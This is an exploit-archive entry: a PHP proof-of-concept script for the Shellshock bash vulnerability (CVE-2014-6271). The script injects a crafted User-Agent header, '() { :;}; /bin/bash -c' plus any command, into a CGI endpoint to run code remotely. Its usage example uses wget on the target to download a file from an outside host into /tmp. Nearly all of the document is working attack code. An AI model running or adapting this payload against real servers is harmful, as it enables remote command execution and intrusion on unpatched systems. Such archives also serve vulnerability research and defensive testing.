Bash Code Injection Proof Of Concept

2014-09-2500:00:00

Prakhar Prasad

packetstormsecurity.com

0.976 High

EPSS

Percentile

100.0%

JSON

`<?php  
/*  
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability  
CVE: 2014-6271  
Vendor Homepage: https://www.gnu.org/software/bash/  
Author: Prakhar Prasad && Subho Halder  
Author Homepage: https://prakharprasad.com && https://appknox.com  
Date: September 25th 2014  
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26  
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)  
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd  
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"  
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/  
  
Test CGI Code : #!/bin/bash  
echo "Content-type: text/html"  
echo ""  
echo "Bash-is-Vulnerable"  
  
*/  
error_reporting(0);  
if(!defined('STDIN')) die("Please run it through command-line!\n");  
$x = getopt("u:c:");  
if(!isset($x['u']) || !isset($x['c']))  
{  
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");  
  
}  
$url = $x['u'];  
$cmd = $x['c'];  
  
$context = stream_context_create(  
array(  
'http' => array(  
'method' => 'GET',  
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'  
)  
)  
);  
  
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)  
die("Command sent to the server!\n");  
else  
die("Connection Error\n");  
?>  
`